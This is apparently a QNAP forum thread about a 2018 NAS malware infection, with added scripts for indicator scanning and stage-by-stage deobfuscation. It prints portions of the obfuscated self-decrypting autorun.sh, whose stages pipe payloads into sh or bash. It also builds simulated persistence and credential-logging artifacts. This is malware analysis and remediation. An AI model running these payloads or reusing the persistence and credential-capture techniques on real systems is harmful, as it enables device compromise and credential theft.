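    printf 'admin:$1$xyz$notthedefault:17700:0:99999:7:::\n' > "$dest/etc/shadow"
    printf '\177ELF' > "$dest/home/httpd/cgi-bin/authLogin.cgi"      # fake ELF header
    [ "$state" = infected ] || return 0
    echo '30 * * * * /share/CACHEDEV1_DATA/.qpkg/.SDa3Z/xQw2.sh >/dev/null 2>&1' >> "$dest/etc/config/crontab"
    printf 'admin:$1$$CoERg7ynjYLsj2j4glJ34.:17700:0:99999:7:::\n' > "$dest/etc/shadow"
    mv "$dest/home/httpd/cgi-bin/authLogin.cgi" "$dest/home/httpd/cgi-bin/QTSauthLogin.cgi"
    printf '#!/bin/sh\nexec -a "$0" /home/httpd/cgi-bin/QTSauthLogin.cgi\n' > "$dest/home/httpd/cgi-bin/authLogin.cgi"
    mkdir -p "$dest/share/CACHEDEV1_DATA/.log"
    echo '203.0.113.7:user=admin&pwd=Y2hhbmdlbWU=' > "$dest/share/CACHEDEV1_DATA/.log/.cgi_log"
}

# Stand-alone demo: sh indicators.sh --demo
if [ "${1:-}" = "--demo" ]; then
    for state in clean infected; do
        t=$(mktemp -d); build_sample_tree "$t" "$state"
        echo "$state tree: $(scan_nas "$t" "$t/share/CACHEDEV1_DATA") finding(s)"
        rm -rf "$t"
    done
fi
```

On a real NAS the functions are pointed at "/" and at whatever ${bdir} the first, omitted part of the decoded script set; `sh indicators.sh --demo` scans the two constructed trees instead. A zero result does not mean the NAS is clean: the scan only covers the persistence and credential-theft pieces visible in this part of the script, not the SSH/UPnP binaries or whatever the cron script itself does.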

Hi MouseTick,
Thanks for the reply! Can you tell us how to "decrypt" the shell script? I'd like to look into mine and see if I can find anything myself.
I don't get the point: why disconnect from the LAN?

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 1:14 am
by somy1982
Also another question: is the following cron job safe?
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 1:49 am
by benzo83
somy1982 wrote:
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies

not too cheap 300euro :/

Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.

unfortunately i do :cry:

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:04 am
by Don
You disconnect from the LAN to protect other devices on the LAN from being compromised by the NAS infection.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:04 am
by Mousetick
somy1982 wrote:Can you tell us how to "decrypt" the shell script? I'd like to look into mine and see if I can find anything myself.

The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.

I strongly discourage you from trying this if you don't fully understand what I just said and what follows.

Example: autorun.sh posted by benzo83. Look for the note "<<<<<<<<<<============ DANGEROUS PART HERE" (added by me).

Code:

#!/bin/sh

WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx

...remainder omitted for brevity...

Before neutering

Code:

'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE

After neutering

Code:

'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"

Executing the neutered script produces the following output, another encrypted script:

Code:

#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/

... remainder omitted for brevity ...

Before neutering

Code:

Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE

After neutering

Code:

Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"

Executing the neutered 2nd stage script produces the following output, the unencrypted autorun.sh:

Code:

#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }

... remainder omitted for brevity ...


Post your script(s) here and I'll see what I can do.

I don't get the point: why disconnect from the LAN?

As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.
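What the neutering step does mechanically, as an added example rather than Mousetick's own procedure: each stage is a one-line decoder (tr with obfuscated character sets) that reads a quoted heredoc and pipes the result into sh or bash, so dropping everything from the pipe onward makes the stage print the next stage instead of running it. The helper below assumes exactly that layout, neuters only the first line that matches (the heredoc body is payload and must stay intact), and repeats until the output no longer pipes a heredoc into an interpreter. The two-stage sample it ships with is constructed for the demonstration, with ROT13 standing in for the real substitution tables and marker names borrowed from the posted script; it is not the malware. The decoder prefix of a real sample still executes, so this belongs in a throwaway VM or container.

```shell
#!/bin/sh
# Stage-by-stage decoder for self-decrypting scripts of the shape shown in
# this thread (added example, not the poster's procedure verbatim). It assumes
# each stage has one line of the form
#     <decoder> ... << "WORD" | <interpreter>
# and removes everything from the pipe onward, so the decoder writes the next
# stage to stdout instead of handing it to sh/bash. The decoder prefix still
# executes: only run this inside a disposable VM or container.

# Neuter the first stage line only; lines inside the heredoc are payload and
# are passed through untouched even if they contain the same pattern.
neuter_stage() {
    awk '
        !seen && match($0, /<<[ \t]*"[A-Za-z0-9_]+"[ \t]*\|/) {
            head = substr($0, 1, RSTART + RLENGTH - 1)   # through the "|"
            sub(/[ \t]*\|$/, "", head)                     # drop "| sh..." part
            print head; seen = 1; next
        }
        { print }' "$1"
}

# Peel at most 8 stages: neuter, execute the neutered decoder, feed its output
# back in, and stop when the result no longer pipes a heredoc into an
# interpreter. Whatever remains (the final plaintext, or a stage whose shape
# the pattern did not recognise) is printed for manual review.
peel_stages() {
    cur=$(mktemp); cp "$1" "$cur"; depth=0
    while [ "$depth" -lt 8 ] && grep -qE '<<[[:space:]]*"[A-Za-z0-9_]+"[[:space:]]*\|' "$cur"; do
        nxt=$(mktemp)
        neuter_stage "$cur" > "$nxt.neutered"
        sh "$nxt.neutered" > "$nxt"
        rm -f "$cur" "$nxt.neutered"
        cur="$nxt"; depth=$((depth + 1))
    done
    cat "$cur"; rm -f "$cur"
}

# Constructed two-stage sample (not the malware): ROT13 via tr stands in for
# the real substitution tables. Stage 1 decodes to a second tr stage, which
# decodes to the final plaintext "echo 'stage two reached'".
write_sample_stage() {
    cat > "$1" <<'EOF'
#!/bin/sh
tr 'A-Za-z' 'N-ZA-Mn-za-m' << "FDdIirg" | sh
ge 'N-Mn-m' 'A-MN-Za-mn-z' << "LzlHfp" | fu
echo 'stage two reached'
LzlHfp
FDdIirg
EOF
}

# Stand-alone demo: sh peel.sh --demo
if [ "${1:-}" = "--demo" ]; then
    s=$(mktemp); write_sample_stage "$s"
    echo "== stage 1, neutered decoder line =="; neuter_stage "$s" | sed -n 2p
    echo "== final stage =="; peel_stages "$s"
    rm -f "$s"
fi
```

If a real stage uses a different shape (the interpreter reached through eval, a base64 or openssl decoder, an unquoted marker) the awk pattern will not match, and peel_stages stops and prints the stage it could not handle; that is the point to fall back to the manual edit described above.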

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:08 am
by somy1982
benzo83 wrote:
somy1982 wrote:
benzo83 wrote:
dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies

not too cheap 300euro :/

Do you have music station installed and enabled?
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.

unfortunately i do :cry:

Check all apps under the .qpkg folder - reinstall them all if you can. I found many sh scripts infected, also the ones malware remover claimed it had recovered!! When exactly on 25/8 was the file created? Mine was around 9am Europe time.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:27 am
by Mousetick
Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.

AutorunDisable.png

This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.

Re: Strange folders and cronjobs

Posted: Sat Sep 08, 2018 2:52 am
by somy1982
Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.

AutorunDisable.png

This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.

Thanks, I have done that and removed the autorun.sh. I deleted everything I could find and also removed all suspicious cron jobs. The NAS has been restarted and the jobs seem to be removed permanently.
Today I went into the .qpkg folder and found many files had been hacked, so now I have reinstalled all apps. Hopefully that's it. Otherwise I have to start from scratch :-(
Does anybody know if QNAP provides a way to completely reset the QTS OS and leave the data unchanged?